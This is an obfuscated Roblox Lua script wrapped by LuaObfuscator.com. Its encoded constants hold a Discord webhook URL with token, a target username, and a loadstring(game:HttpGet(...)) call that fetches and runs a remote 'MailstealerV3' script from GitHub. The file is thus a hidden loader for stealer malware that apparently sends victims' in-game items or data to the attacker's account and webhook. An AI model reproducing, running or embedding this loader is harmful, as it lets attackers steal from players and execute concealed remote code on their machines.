--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v69=0;while true do if (v69==0) then v19=v0(v3(v30,1,1));return "";end end else local v70=0;local v71;while true do if (v70==0) then v71=v2(v0(v30,16));if v19 then local v103=v5(v71,v19);v19=nil;return v103;else return v71;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v72=(v31/((5 -3)^(v32-(2 -1))))%(((880 -(282 + 595)) -1)^(((v33-(2 -1)) -(v32-1)) + (620 -(555 + 64)))) ;return v72-(v72%(932 -(857 + 74))) ;else local v73=(570 -(367 + (1838 -(1523 + 114))))^(v32-(928 -(214 + 713))) ;return (((v31%(v73 + v73))>=v73) and (1 + 0)) or (0 + 0) ;end end local function v21()local v34=0 + 0 ;local v35;while true do if (v34==(1 -0)) then return v35;end if (v34==((1182 -(32 + 85)) -(68 + 997))) then v35=v1(v16,v18,v18);v18=v18 + ((1246 + 25) -(226 + 1044)) ;v34=4 -3 ;end end end local function v22()local v36=350 -(87 + 263) ;local v37;local v38;while true do if (v36==(1 + 0)) then return (v38 * (1213 -((1072 -(67 + 113)) + 65))) + v37 ;end if (v36==0) then v37,v38=v1(v16,v18,v18 + ((3 + 1) -2) );v18=v18 + (3 -1) ;v36=1 -(0 -0) ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + 4 ;return (v42 * (66680831 -49903615)) + (v41 * (66488 -(802 + 150))) + (v40 * ((1249 -560) -433)) + v39 ;end local function v24()local v43=v23();local v44=v23();local v45=1 + (1486 -(998 + 488)) ;local v46=(v20(v44,998 -(750 + 165 + 82) ,792 -(201 + 571) ) * ((5 -3)^(19 + 13))) + v43 ;local v47=v20(v44,21,40 -9 );local v48=((v20(v44,1219 -(1069 + 118) )==(2 -(1139 -(116 + 1022)))) and  -(1 -0)) or (1 + 0) ;if (v47==(0 -0)) then if (v46==(0 + 0)) then return v48 * (791 -(368 + (1760 -1337))) ;else v47=3 -2 ;v45=18 -(10 + 8) ;end elseif (v47==(7874 -5827)) then return ((v46==((141 + 301) -(416 + 26))) and (v48 * (((2 + 1) -2)/(0 + 0)))) or (v48 * NaN) ;end return v8(v48,v47-(1809 -786) ) * (v45 + (v46/((440 -(145 + 293))^(482 -(44 + 386))))) ;end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;local v51={};for v67=3 -2 , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52==(881 -(284 + 594))) then v59=nil;while true do local v82=0 -0 ;local v83;local v84;while true do if (v82~=(0 -0)) then else v83=0;v84=nil;v82=167 -(122 + 44) ;end if (v82~=1) then else while true do if (v83~=0) then else v84=0;while true do if (v84~=1) then else if (v53~=(1 -0)) then else local v150=0;while true do if (v150==0) then v57={v54,v55,nil,v56};v58=v23();v150=1 -0 ;end if (v150~=(66 -(30 + 35))) then else v59={};v53=2;break;end end end if (v53==(0 + 0)) then local v151=0;local v152;local v153;while true do if (v151==(1257 -(1043 + 214))) then v152=0;v153=nil;v151=1;end if (1==v151) then while true do if (v152~=0) then else v153=0;while true do if (v153~=1) then else v56={};v53=3 -2 ;break;end if ((1212 -(323 + 889))==v153) then local v169=0 -0 ;while true do if (v169==0) then v54={};v55={};v169=581 -(361 + 219) ;end if (v169~=1) then else v153=1;break;end end end end break;end end break;end end end break;end if (v84~=0) then else local v119=0;local v120;while true do if (v119~=0) then else v120=320 -(53 + 267) ;while true do if (v120==0) then local v168=0 + 0 ;while true do if (v168==(413 -(15 + 398))) then if (v53~=(984 -(18 + 964))) then else local v170=0 -0 ;local v171;while true do if (v170==(0 + 0)) then v171=0;while true do if (v171==(0 + 0)) then local v175=0;local v176;while true do if (v175~=0) then else v176=850 -(20 + 830) ;while true do if (v176==(1 + 0)) then v171=127 -(116 + 10) ;break;end if (v176==(0 + 0)) then local v182=738 -(542 + 196) ;while true do if (v182~=1) then else v176=1;break;end if (v182~=0) then else for v190=1 -0 ,v58 do local v191=0;local v192;local v193;local v194;local v195;local v196;while true do if (v191~=0) then else v192=0 + 0 ;v193=nil;v191=1;end if (v191~=1) then else v194=nil;v195=nil;v191=2 + 0 ;end if (v191==2) then v196=nil;while true do if (v192~=(0 + 0)) then else local v206=0 -0 ;while true do if (v206==0) then v193=0 -0 ;v194=nil;v206=1552 -(1126 + 425) ;end if (v206==1) then v192=406 -(118 + 287) ;break;end end end if ((3 -2)==v192) then local v207=1121 -(118 + 1003) ;while true do if (v207==(2 -1)) then v192=379 -(142 + 235) ;break;end if (0~=v207) then else v195=nil;v196=nil;v207=1;end end end if (v192~=2) then else while true do if (v193==1) then v196=nil;while true do if (v194~=(4 -3)) then else if (v195==(1 + 0)) then v196=v21()~=0 ;elseif (v195==2) then v196=v24();elseif (v195==3) then v196=v25();end v59[v190]=v196;break;end if (v194~=(977 -(553 + 424))) then else local v217=0 -0 ;local v218;while true do if (v217==0) then v218=0 + 0 ;while true do if (v218==(1 + 0)) then v194=1;break;end if ((0 + 0)==v218) then local v226=0 + 0 ;local v227;while true do if (v226==0) then v227=0 + 0 ;while true do if (v227~=(2 -1)) then else v218=1;break;end if (v227==(0 -0)) then v195=v21();v196=nil;v227=1;end end break;end end end end break;end end end end break;end if ((0 -0)~=v193) then else local v210=0 + 0 ;local v211;while true do if (v210==0) then v211=0;while true do if (v211==1) then v193=4 -3 ;break;end if (v211==0) then v194=753 -(239 + 514) ;v195=nil;v211=1 + 0 ;end end break;end end end end break;end end break;end end end v57[3]=v21();v182=1;end end end end break;end end end if (v171==(1330 -(797 + 532))) then for v177=1,v23() do local v178=0;local v179;local v180;while true do if (v178==1) then while true do if (v179==0) then v180=v21();if (v20(v180,1 + 0 ,1)~=(0 + 0)) then else local v185=0 -0 ;local v186;local v187;local v188;local v189;while true do if (v185==(1203 -(373 + 829))) then local v199=0;while true do if (v199~=(731 -(476 + 255))) then else v188=nil;v189=nil;v199=1131 -(369 + 761) ;end if ((1 + 0)==v199) then v185=2;break;end end end if (v185==0) then local v200=0;while true do if (v200==1) then v185=1 -0 ;break;end if (v200==0) then v186=0 -0 ;v187=nil;v200=239 -(64 + 174) ;end end end if (v185==(1 + 1)) then while true do if (v186==0) then local v201=0;while true do if (v201==(1 -0)) then v186=337 -(144 + 192) ;break;end if ((216 -(42 + 174))==v201) then v187=v20(v180,2,3 + 0 );v188=v20(v180,4,5 + 1 );v201=1 + 0 ;end end end if (3==v186) then if (v20(v188,1507 -(363 + 1141) ,1583 -(1183 + 397) )==(2 -1)) then v189[4]=v59[v189[3 + 1 ]];end v54[v177]=v189;break;end if (v186~=(1 + 0)) then else local v203=1975 -(1913 + 62) ;while true do if (v203==(0 + 0)) then v189={v22(),v22(),nil,nil};if (v187==0) then local v212=0;local v213;local v214;while true do if (v212==(0 -0)) then v213=0;v214=nil;v212=1662 -(1477 + 184) ;end if (v212==(1 -0)) then while true do if (v213==0) then v214=0;while true do if (v214==(0 + 0)) then v189[859 -(564 + 292) ]=v22();v189[4]=v22();break;end end break;end end break;end end elseif (v187==(1 -0)) then v189[3]=v23();elseif (v187==(5 -3)) then v189[307 -(244 + 60) ]=v23() -((2 + 0)^16) ;elseif (v187==3) then local v221=476 -(41 + 435) ;while true do if (0==v221) then v189[3]=v23() -((1003 -(938 + 63))^(13 + 3)) ;v189[1129 -(936 + 189) ]=v22();break;end end end v203=1;end if ((1 + 0)==v203) then v186=2;break;end end end if (v186==(1615 -(1565 + 48))) then local v204=0 + 0 ;local v205;while true do if (v204==(1138 -(782 + 356))) then v205=267 -(176 + 91) ;while true do if (v205~=1) then else v186=3;break;end if (v205==(0 -0)) then local v215=0 -0 ;while true do if ((1093 -(975 + 117))~=v215) then else v205=1;break;end if (v215~=(1875 -(157 + 1718))) then else if (v20(v188,1,1 + 0 )==1) then v189[6 -4 ]=v59[v189[2]];end if (v20(v188,6 -4 ,2)==1) then v189[3]=v59[v189[3]];end v215=1019 -(697 + 321) ;end end end end break;end end end end break;end end end break;end end break;end if (v178~=(0 -0)) then else v179=0 -0 ;v180=nil;v178=2 -1 ;end end end v53=3;break;end end break;end end end if ((2 + 1)==v53) then local v172=0;local v173;local v174;while true do if (v172~=1) then else while true do if ((0 -0)~=v173) then else v174=0;while true do if ((0 -0)~=v174) then else local v181=1227 -(322 + 905) ;while true do if (v181~=0) then else local v183=611 -(602 + 9) ;while true do if (v183~=0) then else for v197=1,v23() do v55[v197-(1190 -(449 + 740)) ]=v28();end return v57;end end end end end end break;end end break;end if (v172~=0) then else v173=872 -(826 + 46) ;v174=nil;v172=1;end end end v168=948 -(245 + 702) ;end if (v168==1) then v120=3 -2 ;break;end end end if (v120==(1 + 0)) then v84=1899 -(260 + 1638) ;break;end end break;end end end end break;end end break;end end end break;end if (v52==(440 -(382 + 58))) then local v74=0;local v75;while true do if (v74==0) then v75=0;while true do if (v75==0) then v53=0;v54=nil;v75=1;end if (1==v75) then v52=3 -2 ;break;end end break;end end end if (v52~=(1 + 0)) then else local v76=0;local v77;while true do if (v76==(0 -0)) then v77=0;while true do if (v77==(2 -1)) then v52=2;break;end if (0~=v77) then else local v108=1205 -(902 + 303) ;while true do if (v108==(1 -0)) then v77=2 -1 ;break;end if (v108~=0) then else v55=nil;v56=nil;v108=1;end end end end break;end end end if (v52~=2) then else local v78=0;while true do if (1~=v78) then else v52=1 + 2 ;break;end if (v78~=(1690 -(1121 + 569))) then else local v102=214 -(22 + 192) ;while true do if (v102==0) then v57=nil;v58=nil;v102=1;end if (v102==1) then v78=684 -(483 + 200) ;break;end end end end end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end if (v63==1) then v66=v60[3];return function(...)local v85=v64;local v86=v65;local v87=v66;local v88=v27;local v89=1;local v90= -1;local v91={};local v92={...};local v93=v12("#",...) -1 ;local v94={};local v95={};for v99=0,v93 do if (v99>=v87) then v91[v99-v87 ]=v92[v99 + 1 ];else v95[v99]=v92[v99 + 1 ];end end local v96=(v93-v87) + 1 ;local v97;local v98;while true do v97=v85[v89];v98=v97[1];if (v98<=5) then if (v98<=2) then if (v98<=0) then local v109=v97[2];local v110=v95[v97[3]];v95[v109 + 1 ]=v110;v95[v109]=v110[v97[4]];elseif (v98==1) then if (v95[v97[2]]==v97[4]) then v89=v89 + 1 ;else v89=v97[3];end else v95[v97[2]]();end elseif (v98<=3) then v95[v97[2]]=v97[3]~=0 ;elseif (v98==4) then v62[v97[3]]=v95[v97[2]];else local v123=v97[2];v95[v123]=v95[v123](v13(v95,v123 + 1 ,v90));end elseif (v98<=8) then if (v98<=6) then v62[v97[3]]=v95[v97[2]];v89=v89 + 1 ;v97=v85[v89];v95[v97[2]]=v97[3]~=0 ;v89=v89 + 1 ;v97=v85[v89];v62[v97[3]]=v95[v97[2]];v89=v89 + 1 ;v97=v85[v89];v95[v97[2]]=v97[3];v89=v89 + 1 ;v97=v85[v89];v89=v97[3];elseif (v98==7) then v95[v97[2]]=v97[3];else local v127=0;local v128;local v129;local v130;local v131;while true do if (1==v127) then v90=(v130 + v128) -1 ;v131=0;v127=2;end if (v127==2) then for v165=v128,v90 do v131=v131 + 1 ;v95[v165]=v129[v131];end break;end if (v127==0) then v128=v97[2];v129,v130=v88(v95[v128](v13(v95,v128 + 1 ,v97[3])));v127=1;end end end elseif (v98<=10) then if (v98==9) then do return;end elseif ((v97[3]=="_ENV") or (v97[3]=="getfenv")) then v95[v97[2]]=v62;else v95[v97[2]]=v62[v97[3]];end elseif (v98==11) then v89=v97[3];else local v133;local v134,v135;local v136;local v137;v62[v97[3]]=v95[v97[2]];v89=v89 + 1 ;v97=v85[v89];if ((v97[3]=="_ENV") or (v97[3]=="getfenv")) then v95[v97[2]]=v62;else v95[v97[2]]=v62[v97[3]];end v89=v89 + 1 ;v97=v85[v89];if ((v97[3]=="_ENV") or (v97[3]=="getfenv")) then v95[v97[2]]=v62;else v95[v97[2]]=v62[v97[3]];end v89=v89 + 1 ;v97=v85[v89];v137=v97[2];v136=v95[v97[3]];v95[v137 + 1 ]=v136;v95[v137]=v136[v97[4]];v89=v89 + 1 ;v97=v85[v89];v95[v97[2]]=v97[3];v89=v89 + 1 ;v97=v85[v89];v137=v97[2];v134,v135=v88(v95[v137](v13(v95,v137 + 1 ,v97[3])));v90=(v135 + v137) -1 ;v133=0;for v147=v137,v90 do v133=v133 + 1 ;v95[v147]=v134[v133];end v89=v89 + 1 ;v97=v85[v89];v137=v97[2];v95[v137]=v95[v137](v13(v95,v137 + 1 ,v90));v89=v89 + 1 ;v97=v85[v89];v95[v97[2]]();v89=v89 + 1 ;v97=v85[v89];v89=v97[3];end v89=v89 + 1 ;end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O312O393039333138333835303734313831302F59314B65503558764168324169504D393079687A38374E313270695044736B704D32767754326F313949344A43534C71397062534C50496C704D444B314A6165444F7748030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F4D61696C737465616C657256332F6D61696E2F6D61696E03083O00557365726E616D6503123O00556365744A656E4B76756C695368696E7932030D3O004C6F6164696E675363722O656E00163O0012073O00013O0026013O000D0001000200040B3O000D0001001207000100043O00120C000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000200046O00013O00024O00010001000100044O001500010026013O00010001000100040B3O000100010012070001000A3O001206000100096O000100013O00122O0001000B3O00124O00023O00044O000100012O00093O00017O00",v9(),...);
